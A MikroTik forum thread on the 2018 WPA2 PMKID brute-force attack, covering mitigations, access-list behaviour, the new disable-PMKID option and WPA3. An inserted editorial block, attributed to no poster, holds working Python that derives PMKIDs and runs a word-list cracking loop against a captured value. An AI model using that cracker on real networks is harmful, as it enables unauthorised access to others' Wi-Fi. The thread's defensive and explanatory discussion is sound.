strods
MikroTik Support
Topic Author
Posts: 1367
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

WPA2 preshared key brute force attack

Thu Aug 09, 2018 10:37 am

It has come to our attention that a new brute-force attack based on the WPA2 standard, using the PMKID, has come to light.

This attack actually is a brute-force attack on the WPA2 pre-shared key. The reason this attack is considered effective is that it can be performed offline, without actually attempting to connect to the AP, based on a single sniffed packet from a valid key exchange.

This problem is not a vulnerability, but a way in which the wireless AP password can be guessed more easily.

In order to mitigate this type of attack you should use a strong password that is hard to brute-force.

To eliminate the possibility of this attack entirely you can use WPA-PSK (do not forget to use aes-ccm encryption!). WPA-PSK does not include the field that is used to verify the password in this attack.
 
eworm
Member Candidate
Posts: 184
Joined: Wed Oct 22, 2014 9:23 am
Location: Oberhausen, Germany

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 10:50 am

With "WPA-PSK" you refer to a non-WPA2-configuration?
Manage RouterOS scripts and extend your devices' functionality: RouterOS Scripts
 
Davis
Frequent Visitor
Posts: 63
Joined: Mon Aug 01, 2011 12:27 pm
Location: Latvia, Riga

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 11:17 am

Are there any benefits to sending the PMKID for non-EAP networks (some people claim that there aren't)?

If not, is it planned to fix this vulnerability (by not sending the PMKID for PSK networks)?

There are actually 3 reasons why this attack is worse than the previously known procedure:
1. It is possible to obtain the PMKID for brute-forcing the PSK password without any clients connected. This is especially bad for admin-only wifi networks (and other networks that usually have no clients connected).
2. Nothing will be logged in MikroTik. AFAIR with the previously known procedure, usually a disassociation (usually many disassociations) followed by a failed association attempt will be logged.
3. This will be unnoticeable for wifi users.

Also, what is the behavior for this bug when "/interface wireless access-list" is used to provide different PSKs for different client MAC addresses?
And what is the behavior for this bug when the wireless interface has "default-authentication=no" (in combination with "/interface wireless access-list" entries)?

P.S. Of course a strong password must always be used, but the attack surface (points where attacks are possible) must also always be reduced. In this case not sending the PMKID would greatly reduce the attack surface for rarely used networks.
 
strods
MikroTik Support
Topic Author
Posts: 1367
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 12:32 pm

The next RouterOS v6.43rc release will have an option that allows disabling the usage of the PMKID. The setting should be used at your own risk, knowing that some clients might not be able to connect.

If it works well, then we will, most likely, backport these changes to the other RouterOS release channels as well.
 
R1CH
Forum Veteran
Posts: 724
Joined: Sun Oct 01, 2006 11:44 pm

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 12:46 pm

How do you get the PMKID from a Mikrotik AP? I have tried the attack on my wAP AC (WPA2-PSK), but the driver didn't implement the necessary fields.
 
Mplsguy
MikroTik Support
Posts: 226
Joined: Fri Jun 06, 2008 5:06 pm

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 12:49 pm

Are there any benefits to sending the PMKID for non-EAP networks (some people claim that there aren't)?
Well, there are no benefits, because using the PMKID allows skipping the authentication stage, which is non-existent when PSK is used anyway. The only reason to include the PMKID when PSK is used is that 802.11 does not seem to be very specific about whether it must be included. What if there is some client that is very strict in checking what it receives?
If not, is it planned to fix this vulnerability (by not sending the PMKID for PSK networks)?
We will add an option to disable sending the PMKID in handshake message 1.
Also, what is the behavior for this bug when "/interface wireless access-list" is used to provide different PSKs for different client MAC addresses?
The PMKID is generated based on the PSK used in the key exchange, so in order to brute-force a particular password you must sniff the handshake frame sent by the AP that contains the PMKID generated using the PSK that you are interested in. Note that "access-list" operates on a MAC address that can be spoofed by an attacker relatively easily, so it is not adding more security - the attacker either needs to observe the handshake of a legitimate client or spoof the client's MAC address and attempt a handshake (it will fail, but nevertheless the attacker will get the frame with the PMKID). If you use per-client PSKs, in case the PSK for one client gets compromised, you only need to change it for that particular client, not all of them.
And what is the behavior for this bug when the wireless interface has "default-authentication=no" (in combination with "/interface wireless access-list" entries)?
Considering that the attacker can sniff frames and spoof the MAC address, the only situation where this will help is when the attacker cannot figure out the MAC address it should use to attempt connecting, but this cannot be considered protection. If the attacker finds out the MAC address of a client that is allowed to connect, he can cause a key handshake and attempt to brute-force the PSK.
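The derivation behind strods' opening post and the reply above, as an added example written for this page (it is not MikroTik's code and was not posted by anyone in the thread). It shows how the PMKID that the AP places in EAPOL-Key message 1 is computed from the PSK, the SSID and the two MAC addresses, why a single captured value is enough for an offline guess-and-check, and why a PMKID produced with an access-list private-pre-shared-key says nothing about the profile-wide key. The SSID, MAC addresses, passphrases and word list are constructed for the example; "Password123" is the placeholder value Davis uses further down the thread.

```python
"""Added example for this thread (not MikroTik code, not from any poster):
how the PMKID in EAPOL-Key message 1 is derived from a WPA2 PSK, why one
captured value is enough for an offline guessing attack, and why a PMKID
made with a per-client private-pre-shared-key reveals nothing about the
profile-wide key.  SSID, MACs, passphrases and word list are constructed."""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11 PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # Those 4096 iterations are the only thing slowing down each guess.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the first 16 bytes of the HMAC.
    # Only the PMK and the two MAC addresses go in: no nonces, no client secret,
    # so the AP's message 1 alone (sent right after association) is a crackable value.
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def crack_pmkid(captured: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes,
                candidates: Iterable[str]) -> Optional[str]:
    # The offline part of the attack: one PBKDF2 run per guess, the AP is never contacted again.
    for guess in candidates:
        candidate = pmkid(pmk_from_passphrase(guess, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(candidate, captured):
            return guess
    return None


# Constructed lab values (not from the thread).
SSID = "MikroTik-Lab"
AP_MAC = mac("4c:5e:0c:aa:bb:cc")
STA_MAC = mac("02:00:00:12:34:56")      # the attacker's own, or a spoofed, client MAC
WORDLIST = ["letmein", "Password123", "correct horse battery staple"]


def simulate_capture(psk_in_use: str) -> bytes:
    # What the AP places in the PMKID KDE of message 1 for this association.
    # RouterOS only reaches this point after 802.11 association succeeded, so with
    # default-authentication=no and no access-list match there is nothing to capture.
    return pmkid(pmk_from_passphrase(psk_in_use, SSID), AP_MAC, STA_MAC)


def demo() -> dict:
    weak = simulate_capture("Password123")               # profile key found in a word list
    strong = simulate_capture("r7Kq!Lm2#vX9pW4zB")       # random characters, in no list
    per_client = simulate_capture("client-A-only-key")   # access-list private-pre-shared-key
    return {
        "weak_profile_key": crack_pmkid(weak, SSID, AP_MAC, STA_MAC, WORDLIST),
        "strong_profile_key": crack_pmkid(strong, SSID, AP_MAC, STA_MAC, WORDLIST),
        # A capture of client A's exchange is bound to client A's key ...
        "per_client_vs_wordlist": crack_pmkid(per_client, SSID, AP_MAC, STA_MAC, WORDLIST),
        # ... so if that key is weak, only client A's key is lost, not the profile key.
        "per_client_if_weak": crack_pmkid(per_client, SSID, AP_MAC, STA_MAC,
                                          WORDLIST + ["client-A-only-key"]),
        "pmkids_differ": weak != per_client,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The corresponding RouterOS-side switch, once the 6.43rc build mentioned later in the thread is installed, is the disable-pmkid setting in /interface wireless security-profiles (parameter name taken from the RouterOS wireless documentation; verify it on your version, since the changelog quoted below only says "CLI only"). It removes the PMKID KDE from message 1 and nothing else: a connected client can still be deauthenticated and its full 4-way handshake captured, so passphrase length and randomness remain the actual defence.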
 
Davis
Frequent Visitor
Posts: 63
Joined: Mon Aug 01, 2011 12:27 pm
Location: Latvia, Riga

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 2:39 pm

The only reason to include the PMKID when PSK is used is that 802.11 does not seem to be very specific about whether it must be included. What if there is some client that is very strict in checking what it receives?
Possibly Ubiquiti might not be sending the PMKID.

We will add an option to disable sending the PMKID in handshake message 1.
Thank you very much for adding this option!

The PMKID is generated based on the PSK used in the key exchange, so in order to brute-force a particular password you must sniff the handshake frame sent by the AP that contains the PMKID generated using the PSK that you are interested in. Note that "access-list" operates on a MAC address that can be spoofed by an attacker relatively easily, so it is not adding more security - the attacker either needs to observe the handshake of a legitimate client or spoof the client's MAC address and attempt a handshake (it will fail, but nevertheless the attacker will get the frame with the PMKID). If you use per-client PSKs, in case the PSK for one client gets compromised, you only need to change it for that particular client, not all of them.
So in this scenario:
  • "default-authentication=no" is set for the access point
  • the corresponding "/interface wireless security-profiles" entry has wpa-pre-shared-key and wpa2-pre-shared-key set to some value (e.g. "wpa-pre-shared-key=Password123 wpa2-pre-shared-key=Password123")
  • "/interface wireless access-list" has entries for clients with a different "private-pre-shared-key" for each client
  • at the moment of the attack no clients are connected (and the attacker does not know the MAC addresses of the clients)

The only information the attacker can obtain is the PMKID of the "wpa2-pre-shared-key" mentioned in the security-profile (in this example - a hash that brute-forces to "Password123"), correct?
And the attacker will not be able to connect with that password (assuming there are no access-list entries without a private-pre-shared-key specified), correct?
I am describing this scenario as it illustrates a possible mitigation of the vulnerability (a locked-down AP with per-device keys) in the situation where this vulnerability has the greatest effect (an AP that is online all the time but rarely has a client connected).

P.S. For other readers I can mention that in case a client is connected, the classical WPA attack (involving spoofing a client disconnection and recording the network traffic while the client reconnects) can be applied, and the benefits of the PMKID attack are very small (not disturbing the client and not getting the classical "disassociation storm" logged in RouterOS).
 
Mplsguy
MikroTik Support
Posts: 226
Joined: Fri Jun 06, 2008 5:06 pm

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 4:42 pm

So in this scenario:
  • "default-authentication=no" is set for the access point
  • the corresponding "/interface wireless security-profiles" entry has wpa-pre-shared-key and wpa2-pre-shared-key set to some value (e.g. "wpa-pre-shared-key=Password123 wpa2-pre-shared-key=Password123")
  • "/interface wireless access-list" has entries for clients with a different "private-pre-shared-key" for each client
  • at the moment of the attack no clients are connected (and the attacker does not know the MAC addresses of the clients)

The only information the attacker can obtain is the PMKID of the "wpa2-pre-shared-key" mentioned in the security-profile (in this example - a hash that brute-forces to "Password123"), correct?
No. In order to obtain any PMKID the attacker must get to the key handshake phase, which happens only after successful 802.11 association. If the client is not in the access-list, it is refused 802.11 association and the AP does not even go to the key handshake phase.
 
Davis
Frequent Visitor
Posts: 63
Joined: Mon Aug 01, 2011 12:27 pm
Location: Latvia, Riga

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 4:55 pm

No. In order to obtain any PMKID the attacker must get to the key handshake phase, which happens only after successful 802.11 association. If the client is not in the access-list, it is refused 802.11 association and the AP does not even go to the key handshake phase.
So in this scenario the attacker won't be able to obtain any password hashes (assuming the attacker will not try to guess MAC addresses)?
 
Mplsguy
MikroTik Support
Posts: 226
Joined: Fri Jun 06, 2008 5:06 pm

Re: WPA2 preshared key brute force attack

Fri Aug 10, 2018 9:16 am

No. In order to obtain any PMKID the attacker must get to the key handshake phase, which happens only after successful 802.11 association. If the client is not in the access-list, it is refused 802.11 association and the AP does not even go to the key handshake phase.
So in this scenario the attacker won't be able to obtain any password hashes (assuming the attacker will not try to guess MAC addresses)?
Correct. Like I said - in order to obtain the PMKID the attacker has to either observe or cause a key handshake, and that happens only after successful 802.11 association. In RouterOS, access-list checking (and radius-mac-authentication as well) happens before the key handshake (this is kind of obvious, because the access-list or radius-mac-authentication can provide the PSK).
 
Samot
Frequent Visitor
Posts: 73
Joined: Sat Nov 25, 2017 10:01 pm

Re: WPA2 preshared key brute force attack

Fri Aug 10, 2018 3:41 pm

I think as long as your wifi password/keys are not something an idiot would use as their luggage combination, you're fine.
 
erickbrito
just joined
Posts: 3
Joined: Mon Jul 20, 2015 6:41 pm

Re: WPA2 preshared key brute force attack

Fri Aug 10, 2018 7:43 pm

There are still several vulnerabilities; soon I will show some of them to be corrected.
Last edited by erickbrito on Fri Aug 10, 2018 8:19 pm, edited 1 time in total.
 
Jotne
Forum Veteran
Posts: 706
Joined: Sat Dec 24, 2016 11:17 am

Re: WPA2 preshared key brute force attack

Fri Aug 10, 2018 7:58 pm

There are still several vulnerabilities; later I will show some of the holes that need to be fixed.
This is an English forum. Please post in English for all to read. You can edit your post and change it.
Not everyone reads Portuguese.
Use Splunk to monitor your MikroTik Router

MikroTik->Splunk
 
macgaiver
Forum Guru
Posts: 1688
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: WPA2 preshared key brute force attack

Tue Aug 14, 2018 4:11 pm

What's new in 6.43rc56 (2018-Aug-13 11:13):
...
*) wireless - added option to disable PMKID for WPA2 (CLI only);
...
So far all devices I have tried connect just fine.
With great knowledge comes great responsibility, because of ability to recognize id... incompetent people much faster.
 
Simono
newbie
Posts: 41
Joined: Tue Mar 20, 2018 9:41 am

Re: WPA2 preshared key brute force attack

Sat Aug 18, 2018 9:42 am

Of course this will also be an option in CAPsMAN?
 
JimmyNyholm
Member Candidate
Posts: 246
Joined: Mon Apr 25, 2016 2:16 am
Location: Sweden

Re: WPA2 preshared key brute force attack

Sat Aug 18, 2018 9:54 am

And what about working on WPA3?
 
bratislav
newbie
Posts: 49
Joined: Mon May 05, 2014 10:36 am

Re: WPA2 preshared key brute force attack

Sat Aug 18, 2018 1:25 pm

And what about working on WPA3?
According to Qualcomm you need new chipsets for WPA3, so it seems that old gear won't be able to support it ...
 
JimmyNyholm
Member Candidate
Posts: 246
Joined: Mon Apr 25, 2016 2:16 am
Location: Sweden

Re: WPA2 preshared key brute force attack

Fri Aug 24, 2018 9:01 pm

And what about working on WPA3?
According to Qualcomm you need new chipsets for WPA3, so it seems that old gear won't be able to support it ...
As far as I can tell that is a big spit of "bullspit" ;-) WPA3 can be done in software only if the hardware features in an old chip are too slow. But then again brain-dead old cheap APs have slow CPUs as well, so........... But supporting a new standard is one thing. Turning on ALL the nerd knobs of that new standard is another one.

SO....

MikroTik: how about a statement of how, when and where we will be able to use WPA3 instead?
 
Chupaka
Forum Guru
Posts: 8142
Joined: Mon Jun 19, 2006 11:15 pm
Location: Minsk, Belarus

Re: WPA2 preshared key brute force attack

Mon Aug 27, 2018 1:11 pm

MikroTik: how about a statement of how, when and where we will be able to use WPA3 instead?
Or at least, "whether" :)
Russian-speaking forum: https://forum.mikrotik.by/. Welcome!

For every complex problem, there is a solution that is simple, neat, and wrong.

MikroTik. Your life. Your routing.
 
normis
MikroTik Support
Posts: 23608
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: WPA2 preshared key brute force attack

Mon Aug 27, 2018 2:20 pm

WPA3 is not supported in any client devices yet, as far as I know.
No answer to your question? How to write posts
 
Jotne
Forum Veteran
Posts: 706
Joined: Sat Dec 24, 2016 11:17 am

Re: WPA2 preshared key brute force attack

Mon Aug 27, 2018 7:55 pm

Someone has to be first; if everyone is waiting for everyone else to release WPA3, it will never come :)
 
honzam
Forum Guru
Posts: 2173
Joined: Wed Feb 27, 2008 10:27 pm
Location: Czech Republic

Re: WPA2 preshared key brute force attack

Mon Aug 27, 2018 10:57 pm

Someone has to be first; if everyone is waiting for everyone else to release WPA3, it will never come :)
Yes, it is true. Sometimes MikroTik might be the first.
LAN, FTTx, Wireless. ISP operator
 
notToNew
Member Candidate
Posts: 135
Joined: Fri Feb 19, 2016 3:15 pm

Re: WPA2 preshared key brute force attack

Sun Sep 09, 2018 8:38 am

Of course this will also be an option in CAPsMAN?
It already is. Just try it.
--------------------------------------------------------------------------------------------
CCR1036-12G-4S, several 952Ui-5ac2nD, ...
 
suzaanroshan
just joined
Posts: 1
Joined: Sun Sep 23, 2018 4:55 pm

Re: WPA2 preshared key brute force attack

Sat Oct 13, 2018 1:44 pm

Thank you from your subscribers.
Just what happens if we do not use aes-ccm encryption?
 
sayto
just joined
Posts: 1
Joined: Sun Oct 14, 2018 10:39 am

Re: WPA2 preshared key brute force attack

Sun Oct 14, 2018 10:42 am

Thank you for the thread it was really helpful and informative.
 
sungirl
just joined
Posts: 1
Joined: Sun Oct 14, 2018 1:56 pm

Re: WPA2 preshared key brute force attack

Sun Oct 14, 2018 3:42 pm

I think that WPA3 is not supported in any client devices yet